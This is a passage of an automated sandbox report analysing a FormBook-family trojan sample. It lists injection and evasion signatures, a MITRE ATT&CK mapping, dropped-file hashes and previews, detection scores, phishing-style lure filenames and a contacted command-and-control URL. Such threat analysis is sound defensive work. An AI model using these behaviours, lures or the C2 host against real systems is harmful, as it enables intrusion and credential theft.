          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h]3_2_00A2AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEE539 mov eax, dword ptr fs:[00000030h]3_2_00AEE539
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h]3_2_00AF8D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h]3_2_00AAA537
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE3518 mov eax, dword ptr fs:[00000030h]3_2_00AE3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE3518 mov eax, dword ptr fs:[00000030h]3_2_00AE3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE3518 mov eax, dword ptr fs:[00000030h]3_2_00AE3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A48D76 mov eax, dword ptr fs:[00000030h]3_2_00A48D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A48D76 mov eax, dword ptr fs:[00000030h]3_2_00A48D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A48D76 mov eax, dword ptr fs:[00000030h]3_2_00A48D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A48D76 mov eax, dword ptr fs:[00000030h]3_2_00A48D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A48D76 mov eax, dword ptr fs:[00000030h]3_2_00A48D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]3_2_00A4C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]3_2_00A4C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h]3_2_00A63D43
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h]3_2_00AA3540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD8D47 mov eax, dword ptr fs:[00000030h]3_2_00AD8D47
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD3D40 mov eax, dword ptr fs:[00000030h]3_2_00AD3D40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2354C mov eax, dword ptr fs:[00000030h]3_2_00A2354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2354C mov eax, dword ptr fs:[00000030h]3_2_00A2354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h]3_2_00A47D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A64D51 mov eax, dword ptr fs:[00000030h]3_2_00A64D51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A64D51 mov eax, dword ptr fs:[00000030h]3_2_00A64D51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB2EA3 mov eax, dword ptr fs:[00000030h]3_2_00AB2EA3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h]3_2_00AA46A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE56B6 mov eax, dword ptr fs:[00000030h]3_2_00AE56B6

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeSection loaded: unknown target: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe' Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery23Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection111Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection111Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information4LSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing12Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe39%VirustotalBrowse
          SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe31%ReversingLabsWin32.Trojan.Generic
          SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\z9ayiyo.dll19%ReversingLabsWin32.Trojan.Convagent

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.856380692.xyz/nsag/0%VirustotalBrowse
          www.856380692.xyz/nsag/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.856380692.xyz/nsag/true
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorSecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exefalse
            high
            http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exefalse
              high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:356592
              Start date:23.02.2021
              Start time:11:50:46
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 4m 49s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.17259 (renamed file extension from 17259 to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@3/4@0/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 26.5% (good quality ratio 24.8%)
              • Quality average: 72.9%
              • Quality standard deviation: 30.9%
              HCA Information:
              • Successful, ratio: 62%
              • Number of executed functions: 42
              • Number of non-executed functions: 79
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Stop behavior analysis, all processes terminated
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dllQTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                  lpdKSOB78u.exeGet hashmaliciousBrowse
                    jTmBvrBw7V.exeGet hashmaliciousBrowse
                      523JHfbGM1.exeGet hashmaliciousBrowse
                        TAk8jeG5ob.exeGet hashmaliciousBrowse
                          PAYMENT COPY.exeGet hashmaliciousBrowse
                            ORDER LIST.xlsxGet hashmaliciousBrowse
                              Orderoffer.exeGet hashmaliciousBrowse
                                Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                  INV_PR2201.docmGet hashmaliciousBrowse
                                    CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                      Request for Quotation.exeGet hashmaliciousBrowse
                                        #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                          Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                            quote.exeGet hashmaliciousBrowse
                                              Order83930.exeGet hashmaliciousBrowse
                                                Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                  Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                    GPP.exeGet hashmaliciousBrowse
                                                      C:\Users\user\AppData\Local\Temp\z9ayiyo.dllQTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\nsaBD31.tmp
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):191404
                                                        Entropy (8bit):7.878606044995474
                                                        Encrypted:false
                                                        SSDEEP:3072:2ojw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAWXNt:2ogstrYBJ9Dy3SFSxuPmWrt
                                                        MD5:4FECDED6A29355A90A3D3B3AABBB16E4
                                                        SHA1:F0F16D89E8D1DD35F088CB49298DEA74A3FFF53B
                                                        SHA-256:29680AD46B1D8A090A403798300D02897B547CF3F87FE44ADA08D95C7D34406B
                                                        SHA-512:03889A1FA29D924FD5EB1C293A8D62FAF78876EC5CCF90F7602DC92302DB1D06BC162BDE097A66E9D148C90D0B7920E539CED3D0EF3A9AB4DD230AA73DE7EC7D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dll
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.855045165595541
                                                        Encrypted:false
                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: QTN3C2AF414EDF9_041873.xlsx, Detection: malicious, Browse
                                                        • Filename: TIC ENQ2040 FCl.xlsx, Detection: malicious, Browse
                                                        • Filename: lpdKSOB78u.exe, Detection: malicious, Browse
                                                        • Filename: jTmBvrBw7V.exe, Detection: malicious, Browse
                                                        • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                        • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                        • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                        • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                        • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                        • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                        • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                        • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                        • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                        • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                        • Filename: quote.exe, Detection: malicious, Browse
                                                        • Filename: Order83930.exe, Detection: malicious, Browse
                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                        • Filename: GPP.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\tjqth.zz
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):164352
                                                        Entropy (8bit):7.998867839876064
                                                        Encrypted:true
                                                        SSDEEP:3072:ajw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAW2:agstrYBJ9Dy3SFSxuPmWo
                                                        MD5:D0AA54167E81FD8C6C7CBC832E178855
                                                        SHA1:7DEB6EB916CCDB8BDF62214F2F3026E9758CBCF6
                                                        SHA-256:C8FD43535A87747A5046D1096717E18CE1E67D1B428498C072F011F3FA9A21E0
                                                        SHA-512:380D39FA1D20BA78F13F91B3B5EA16B058BC864019C8608898941B723E9B04DFEAADDFAF041DC0D888388E056CA188978AEB3797A2C243313772AD83EB7FCFB7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: .......Z...~....m...r...~.k.O...Sq....T.E..X.zT..y.*r.{.....s2=...t7^...a.?Gb.4k.).l4e.d.........X.?AO..*.[....].}....0..........j~v...Q.D!A.wA......W.C..@{y...s.#z}.......\x..#4..i.=)dO......#^$..s.._..G{.....8s(...q[..>.D.\U..W....{....6s.?i.:?.{.f.(.|......]..3...^(tS...+..o.N..Kn].,.. %.`.....M^.CRlj3.{.[..i.\-.....l.....+.:YD.....v.c.~[.....~...z.F._a.i/.g\.uF.l..G.D=......:...;...+.F..C...33.R3.[j=...%..G.a{P....KWu....L{...Zr.....6IE<..E&....H..j..;R......K...^}.....CO..v...'ov!..f$j....A...Uh.y.......8'...$.....'aSS.k57.(..}I...U......wL. ...-;....A..qXZ....)*8x.V...1...s....PM.(&j.w..a.R..Rx..<;e2.... ......K..V..c5.lD.eT.n../b..7P..S..I....K~.....K....I..._.p...,:.H.1...4.4.!...6.......?.x...N.*.;.....8..;.Op.u..]...\..B..4J....`.t".BEm.`\..2....;..C.).uV7...m...c...x9W.m#..T....@A2M..(..$S......l$b.8..........4'#..OM.%...\..F.d...|..v.`../x.......#.3.l....1XB.[s..>..g.bz....c.Ax.I.q;O..'. P.n.y..0...c...w9..'\....".s.....1
                                                        C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):6.6898431043201
                                                        Encrypted:false
                                                        SSDEEP:96:NEBgIVyWyVDSLUpyceXGkLF6HSFLdtyfJHxPVAcnuvmMeT8XfWJ1QhulooeUZi+w:qBnADSLwgXG7yFDixPVmxP4QPCrvLs3
                                                        MD5:94A51F0839DE3A6F5069F766E7BDE4A7
                                                        SHA1:19454F40631ACE4B3DE692C245E3F2551A6794D6
                                                        SHA-256:2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
                                                        SHA-512:07468053EFD63FC4B404D87722E0E282B1C5C487CF97E6D858771B67B2574C90D62341FD96D3CFB94ACA6ED357E40657842ADD01E7C563AE170A65450A4EB75A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 19%
                                                        Joe Sandbox View:
                                                        • Filename: QTN3C2AF414EDF9_041873.xlsx, Detection: malicious, Browse
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L...F.4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.895818449493941
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        File size:217624
                                                        MD5:2915c0afb0b6b26a5a699965d2119f7a
                                                        SHA1:32fdcc2e0bcfc476347078d7ea05f12d5a259bea
                                                        SHA256:38b6a40d2eeddf38695294c57971fc2efab81fea95100260a2003baa13616b83
                                                        SHA512:b8312043058b28c0eede079425d785b581aabeae63c889ddc4382faa2b070333fc8a6e76f7810678cb9ae96b9e52d6e48604cef9417c565c97c0faadfe36b953
                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

                                                        File Icon

